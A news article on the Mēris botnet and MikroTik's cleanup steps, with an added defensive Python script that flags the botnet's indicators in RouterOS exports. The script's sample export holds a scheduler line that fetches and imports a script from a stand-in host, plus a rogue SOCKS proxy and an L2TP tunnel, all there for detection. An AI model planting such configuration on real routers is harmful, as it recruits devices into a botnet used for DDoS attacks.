Mēris: How to Stop the Most Powerful Botnet on Record
MikroTik Flaws Still Being Exploited, But There Are Mitigation Steps
The Mēris botnet, responsible for huge waves of distributed denial-of-service attacks recorded by cybersecurity firms Qrator Labs and Cloudflare, is still active, using "abandoned" MikroTik routers running a vulnerable version of MikroTik RouterOS. The botnet recently came to prominence after being deployed in what the Russian media describes as the "largest distributed denial-of-service attack in the history of the Runet." The Runet is the Russian internet.
The botnet has been targeting internet service providers, financial entities, large e-commerce companies and even some smaller targets, including the website of cybersecurity journalist Brian Krebs, who runs the news blog KrebsOnSecurity.
The largest shares of attacking hosts were located in Brazil (10.9%), Indonesia (10.9%) and India (5.9%), and most of them were running vulnerable versions of MikroTik RouterOS, Qrator Labs' researchers report.
Reiterating Qrator's findings, Patrick Donahue, director of product at Cloudflare, told news site The Daily Swig that the "attack we saw ... was almost entirely composed of MikroTik devices."
Still a Threat
MikroTik, the Latvia-based manufacturer, issued a fix in April 2018 for the vulnerability designated CVE-2018-14847 (see: MikroTik Routers Targeted in Data Eavesdropping Scheme).
At the time, MikroTik advised users to immediately upgrade Winbox and RouterOS, change passwords, firewall the Winbox port (8291 by default) on public interfaces and untrusted networks, and look out for abnormalities such as unknown SOCKS proxy settings and scripts.
But only 30% of the vulnerable devices were patched, which means approximately 200,000 routers remain vulnerable, news platform Threatpost reports, citing a report from cybersecurity company Tenable.
In addition, Alexander Lyamin, founder and CEO of Qrator Labs, tells ISMG that the Mēris botnet is still being leveraged in an ongoing attack, although there has been a sharp decline in its volume in the past few weeks.
When contacted by Information Security Media Group, MikroTik said that currently there is not much that it can do as the vulnerability being exploited in its devices today - CVE-2018-14847 - is from three years ago and a fix for it was issued at that time. It adds that this update requires a physical connection to the vulnerable devices, which means, "We can do nothing about completely abandoned devices where somebody has plugged in and left it alone."
Initially, this looked like a dead end for containing the abuse of MikroTik devices in the Mēris botnet, but a workaround does exist, MikroTik suggests in a recently released security blog.
Taming the Mēris Monster
To remove compromised MikroTik devices from the Mēris botnet, MikroTik recommends checking for and removing the following configuration items:
- Remove any System Scheduler entry that executes a Fetch script.
- If you do not use the IP SOCKS proxy or do not know what it does, disable it. Mēris uses it to monitor and multiply botnet traffic.
- Remove the Layer 2 Tunneling Protocol (L2TP) client named "lvpn" and any other L2TP client that you do not recognize. Yandex's researchers have found the Mēris botnet abusing this protocol.
- Disable the input firewall rule that allows access to port 5678. This open port is how these devices were hacked without their owners noticing, Qrator's researchers say; attackers used the standard services associated with this port as a disguise during the attack.
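Checking each router for these items by hand does not scale across a fleet, so the following is an added example (not MikroTik's code and not part of the original article) that scans the text of a RouterOS `/export` dump for the four indicators above, plus the unknown SOCKS settings and scripts MikroTik warned about in 2018, and prints the RouterOS command that removes each one. The sample export, its URL, IP address and entry names are constructed for illustration; the cleanup commands use standard RouterOS `remove`, `set` and `disable` syntax, and the allow-list of legitimate L2TP client names is an assumed parameter the operator supplies.

```python
"""Scan RouterOS `/export` output for the Mēris configuration indicators above."""
import re
import shlex

# Constructed sample in the shape of an `/export` dump (not a real capture):
# the URL, IP address and entry names are made up for illustration. The first
# scheduler line is wrapped the way /export wraps long lines (trailing
# backslash, indented continuation).
SAMPLE_EXPORT = """\
# sep/09/2021 10:00:00 by RouterOS 6.48
/system scheduler
add interval=10m name=U6 on-event="/tool fetch url=http://example.invalid/poll/x.rsc \\
    mode=http dst-path=x.rsc; /import x.rsc" policy=ftp,reboot,read,write,policy,test
add interval=1d name=nightly on-event="/system backup save name=daily" policy=read,write
/ip socks
set enabled=yes port=5678
/interface l2tp-client
add connect-to=198.51.100.7 disabled=no name=lvpn password=lvpn user=lvpn
/ip firewall filter
add action=accept chain=input connection-state=established,related
add action=accept chain=input dst-port=5678 protocol=tcp
"""


def parse_export(text):
    """Return (section, verb, params) for every command line of an /export dump."""
    entries, section, pending = [], None, ""
    for raw in text.splitlines():
        if raw.rstrip().endswith("\\"):        # line continues on the next one
            pending += raw.rstrip()[:-1]
            continue
        line = (pending + raw.lstrip()).strip()
        pending = ""
        if not line or line.startswith("#"):   # blank line or header comment
            continue
        if line.startswith("/"):               # section header, e.g. "/ip firewall filter"
            section = line
            continue
        verb, *args = shlex.split(line)        # shlex keeps the quoted on-event value intact
        params = dict(tok.partition("=")[::2] for tok in args)
        entries.append((section, verb, params))
    return entries


def find_indicators(entries, known_l2tp=frozenset()):
    """Match the four indicators; return (finding, RouterOS cleanup command) pairs.

    known_l2tp is an assumed allow-list of L2TP client names the operator created
    deliberately; "lvpn" is flagged regardless. dst-port ranges such as 5000-6000
    are not expanded, so a rule hiding 5678 inside a range is not reported.
    """
    findings = []
    for section, verb, p in entries:
        name = p.get("name", "")
        if (section == "/system scheduler" and verb == "add"
                and re.search(r"/tool\s+fetch", p.get("on-event", ""))):
            findings.append((f"scheduler '{name}' runs /tool fetch: {p['on-event']}",
                             f'/system scheduler remove [find name="{name}"]'))
        elif section == "/ip socks" and verb == "set" and p.get("enabled") == "yes":
            findings.append((f"SOCKS proxy enabled on port {p.get('port', '?')}",
                             "/ip socks set enabled=no"))
        elif (section == "/interface l2tp-client" and verb == "add"
                and (name == "lvpn" or name not in known_l2tp)):
            findings.append((f"unrecognised L2TP client '{name}' to {p.get('connect-to', '?')}",
                             f'/interface l2tp-client remove [find name="{name}"]'))
        elif (section == "/ip firewall filter" and verb == "add"
                and p.get("chain") == "input" and p.get("action") == "accept"
                and "5678" in p.get("dst-port", "").split(",")):
            findings.append(("input chain accepts port 5678",
                             "/ip firewall filter disable [find chain=input dst-port=5678]"))
    return findings


def check_export(text, known_l2tp=frozenset()):
    """Parse an /export dump and return the findings with their cleanup commands."""
    return find_indicators(parse_export(text), known_l2tp)


if __name__ == "__main__":
    for finding, fix in check_export(SAMPLE_EXPORT):
        print(f"{finding}\n    fix: {fix}")
```

Feed it a dump saved from the router (for example `ssh admin@router /export > router.rsc`). It reports configuration only: an `/export` does not contain the admin password, so changing the default credentials and upgrading RouterOS remain separate steps, and a router whose export is clean can still be reachable with a stolen password.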
All MikroTik devices ship with a default admin account: username "admin" and an empty password. Lyamin tells ISMG, "[This] is a good reason why the industry has tried to abandon password authentication in past [few] years. Poor password practices is a real problem in the info security world nowadays."
MikroTik recognizes this default password issue and says it is working toward fixing it. Currently, however, the only remediation available is changing the default credentials. As good practice, MikroTik recommends that everyone, even those who have already changed the default credentials, change their passwords again.
Beyond immediate patching, firewall configuration and password changes, MikroTik suggests blocking the 40 addresses and domains associated with the botnet's malicious scripts. The complete list is at the end of MikroTik's security blog.
Lyamin supports this strategy, saying, "We have actively communicated [this strategy] with a number of ISPs and hosting companies around the world to suppress the activity of this botnet. It turned out to be quite an effective strategy since in the past week the total number of active bots decreased to mere thousands."
MikroTik told ISMG that its greatest challenge in executing the entire remediation process is that, "MikroTik sells only to wholesalers and large distributors. We have no registration process for end-users, and we don't sell to them directly. This means we can only reach out to our distributors and our end users through our social media accounts. Distributors … sell these units in street shops, without requiring any contact information. This means there are many devices where nobody knows who is using it."
Qrator researchers add that because the attack traffic is not spoofed, every victim sees the true source addresses. "Blocking it for a while should be enough to thwart the attack and not disturb the possible end user," it says.
MikroTik Warned Earlier
Unfortunately, even those who patched when the vulnerability was first discovered in 2018 are not necessarily safe. "If somebody got your password in 2018, just an upgrade will not help. You must also change your password and apply firewall rules for the traffic coming in from the open internet," MikroTik tells ISMG.
"Most of these devices are not managed by anyone. The above solution (or any solution) requires a user to connect to the device and press a button to upgrade, or a button to clean the configuration. We don't have any remote access to our products and can't do anything without user consent," MikroTik says.
Users on a MikroTik forum add, "One of the many problems [with this procedure] is that many routers are at remote locations and netinstall only works locally. Some are high up in tower or roof tops etc."
MikroTik explains to ISMG that although it "tried to reach all users of RouterOS about this, many have never been in contact with MikroTik and are not actively monitoring their devices." The company added: "We will [soon] add an option in our router management apps, that if malicious configuration is detected, users will be alerted, and [we will] offer to automatically clean the malicious configuration. This though does require somebody to connect to the router [physically]."
"As far as we know, right now there are no new vulnerabilities in these devices and the RouterOS has been recently independently audited by several contractors," the company tells ISMG.
The Rise and Spread of Mēris
Qrator's team collaborated with Russian search engine Yandex so that the botnet's activity could be monitored in almost real time.
Yandex's observations chart the growth of the attack, in requests per second (rps), across the following dates:
- Aug. 7, 2021: 5.2 million rps;
- Aug. 9, 2021: 6.5 million rps;
- Aug. 29, 2021: 9.6 million rps;
- Aug. 31, 2021: 10.9 million rps;
- Sept. 5, 2021: 21.8 million rps.
Qrator says more than 30,000 host devices taken over by the Mēris botnet were used in the attack. Yandex saw nearly 56,000 attacking hosts hitting its servers and estimates the botnet has likely compromised over 250,000 devices, Threatpost reports.
Lyamin tells ISMG, "Mēris can now be rented out through Telegram channels … the group behind it has recently announced a discount program and is offering services starting from $80 per hour." This means another wave is coming soon or the botnet is being leveraged in other attack types and vectors, he says.
Confirming the popularity of this botnet, cyber threat intelligence company Kela tweeted that the admin of the Lockbit ransomware group is looking for the botnet's operators.